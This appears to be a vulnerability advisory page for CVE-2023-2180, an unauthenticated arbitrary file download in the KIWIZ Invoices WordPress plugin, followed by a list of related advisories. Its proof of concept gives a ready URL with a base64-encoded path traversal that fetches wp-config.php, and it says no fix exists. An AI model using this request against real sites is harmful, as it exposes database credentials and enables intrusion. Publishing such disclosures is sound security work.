KIWIZ Invoices Certification & PDF System <= 2.1.3 – Unauthenticated Arbitrary File Download | CVE 2023-2180 | Plugin Vulnerabilities

Description

The plugin does not validate the path of files to be downloaded, which could allow unauthenticated attacker to read/downlaod arbitrary files, as well as perform PHAR unserialization (assuming they can upload a file on the server)

Proof of Concept

To download ../../../../wp-config.php:

https://example.com/wp-content/plugins/woocommerce-gateway-certification-de-facture-et-gestion-de-pdf-kiwiz/entrypoint/concat-pdf.php?file_name=Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==

The downloaded file will have the pdf extension, just change it to php

Affects Plugins

woocommerce-gateway-certification-de-facture-et-gestion-de-pdf-kiwiz

No known fix

References

CVE

Classification

Type

FILE DOWNLOAD

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

WPScan

Verified

Yes

WPVDB ID

4d3b90d8-8a6d-4b72-8bc7-21f861259a1b

Timeline

Publicly Published

2023-04-19 (about 2 years ago)

Added

2023-04-19 (about 2 years ago)

Last Updated

2023-04-19 (about 2 years ago)

Other

Published

Title

Published

2025-03-04

Title

Downloable by American Osteopathic Association <= 0.1.0 - Unauthenticated Arbitrary File Download

Published

2025-11-20

Title

Tainacan < 1.0.1 - Unauthenticated Information Exposure

Published

2025-02-27

Title

wpForo Forum < 2.4.2 - Subscriber+ Arbitrary File Read

Published

2022-09-19

Title

Download Monitor < 4.5.98 - Admin+ Arbitrary File Download

Published

2022-12-05

Title

Welcart e-Commerce < 2.8.5 - Subscriber+ Arbitrary File Access